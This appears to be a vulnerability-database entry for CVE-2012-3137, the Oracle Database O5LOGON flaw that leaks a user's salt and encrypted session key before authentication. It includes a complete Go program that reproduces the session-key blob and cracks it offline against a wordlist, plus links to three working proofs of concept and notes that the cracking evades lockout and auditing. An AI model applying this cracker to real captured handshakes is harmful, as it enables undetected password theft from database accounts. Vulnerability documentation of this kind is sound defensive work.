CVE-2012-3137

Oracle Database Server - Info Disclosure

Title source: llm

Description

The authentication protocol in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote attackers to obtain the session key and salt for arbitrary users, which leaks information about the cryptographic hash and makes it easier to conduct brute force password guessing attacks, aka "stealth password cracking vulnerability."
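What makes the leak exploitable is that, in the 11g O5LOGON handshake, the server returns AUTH_VFR_DATA (a 10-byte salt) and AUTH_SESSKEY (a 48-byte blob: a 40-byte session key plus 8 bytes of PKCS#7 padding, AES-192-CBC under SHA-1(password || salt) padded with four zero bytes, zero IV) as soon as a client names a user, before any password is sent. Anyone who can open a connection can collect that pair for any username and then test guesses offline: a candidate is correct exactly when the last decrypted block ends in eight 0x08 bytes. The Go program below is an added example written for this page, not code from the listed PoCs or from Oracle; it assumes the key derivation and padding layout just described, and the salt and session key it uses are constructed for the demonstration, not captured from a server. It models both sides: the server producing the blob, and the attacker verifying guesses against it.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha1"
	"encoding/hex"
	"errors"
	"fmt"
)

// Sizes assumed for the 11g handshake: a 10-byte AUTH_VFR_DATA salt and a
// 48-byte AUTH_SESSKEY (40 bytes of key material + 8 bytes of PKCS#7 padding).
const (
	saltLen    = 10
	sessKeyLen = 40
	blobLen    = 48
)

// deriveKey builds the AES-192 key that protects AUTH_SESSKEY:
// SHA-1(password || salt) followed by four zero bytes (20 + 4 = 24 bytes).
func deriveKey(password string, salt []byte) []byte {
	h := sha1.New()
	h.Write([]byte(password))
	h.Write(salt)
	return append(h.Sum(nil), 0, 0, 0, 0)
}

// serverSessKeyBlob models the server side: pad the 40-byte session key to 48
// bytes with PKCS#7 (eight 0x08 bytes) and encrypt it, CBC with a zero IV, under
// the password-derived key. This is what an unauthenticated client receives.
func serverSessKeyBlob(password string, salt, sessKey []byte) ([]byte, error) {
	if len(salt) != saltLen || len(sessKey) != sessKeyLen {
		return nil, errors.New("bad salt or session key length")
	}
	block, err := aes.NewCipher(deriveKey(password, salt))
	if err != nil {
		return nil, err
	}
	plain := append(append([]byte{}, sessKey...), bytes.Repeat([]byte{8}, blobLen-sessKeyLen)...)
	out := make([]byte, blobLen)
	cipher.NewCBCEncrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(out, plain)
	return out, nil
}

// tryPassword is the offline oracle the leak creates: decrypt the captured blob
// under a candidate and check whether the final block carries valid padding.
// No further traffic to the server is needed, so nothing is logged or locked out.
func tryPassword(candidate string, salt, blob []byte) bool {
	if len(salt) != saltLen || len(blob) != blobLen {
		return false
	}
	block, err := aes.NewCipher(deriveKey(candidate, salt))
	if err != nil {
		return false
	}
	plain := make([]byte, blobLen)
	cipher.NewCBCDecrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(plain, blob)
	return bytes.Equal(plain[sessKeyLen:], bytes.Repeat([]byte{8}, blobLen-sessKeyLen))
}

// crackOffline runs a wordlist against one captured (AUTH_VFR_DATA, AUTH_SESSKEY) pair.
func crackOffline(salt, blob []byte, wordlist []string) (string, bool) {
	for _, w := range wordlist {
		if tryPassword(w, salt, blob) {
			return w, true
		}
	}
	return "", false
}

func main() {
	// Constructed handshake: the salt is a fixed made-up value and the session
	// key is random; neither was captured from a real server.
	salt, _ := hex.DecodeString("0102030405060708090a")
	sessKey := make([]byte, sessKeyLen)
	if _, err := rand.Read(sessKey); err != nil {
		panic(err)
	}
	blob, err := serverSessKeyBlob("Welcome1", salt, sessKey)
	if err != nil {
		panic(err)
	}
	fmt.Printf("AUTH_VFR_DATA: %X\nAUTH_SESSKEY:  %X\n", salt, blob)

	// The attacker's side: only the two leaked values and a wordlist are needed.
	if pw, ok := crackOffline(salt, blob, []string{"oracle", "manager", "Welcome1", "tiger"}); ok {
		fmt.Println("recovered password:", pw)
	} else {
		fmt.Println("not in wordlist")
	}
}
```

Two practical consequences follow from the mechanism. First, the attacker never submits a password, so account lockout and failed-logon auditing give no signal; the only trace is one aborted handshake per targeted username. Second, the leaked pair is a salted SHA-1 derived value, so guessing runs at hash-cracking speed on the attacker's hardware rather than at the server's authentication rate.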

Exploits (3)

exploitdb · WORKING POC
by Esteban Martinez Fayo · python · local · multiple
https://www.exploit-db.com/exploits/22069
nomisec · WORKING POC · 4 stars
by r1- · poc
https://github.com/r1-/cve-2012-3137
nomisec · WORKING POC · 3 stars
by hantwister · poc
https://github.com/hantwister/o5logon-fetch

Scores

EPSS 0.5492
EPSS Percentile 98.1%

Details

CWE
CWE-287
Status published
Products (9)
oracle/database_server 10.2.0.3
oracle/database_server 10.2.0.4
oracle/database_server 10.2.0.5
oracle/database_server 11.1.0.7
oracle/database_server 11.2.0.2
oracle/database_server 11.2.0.3
oracle/primavera_p6_enterprise_project_portfolio_management 8.2
oracle/primavera_p6_enterprise_project_portfolio_management 8.3
oracle/primavera_p6_enterprise_project_portfolio_management 8.4
Published Sep 21, 2012
Tracked Since Feb 18, 2026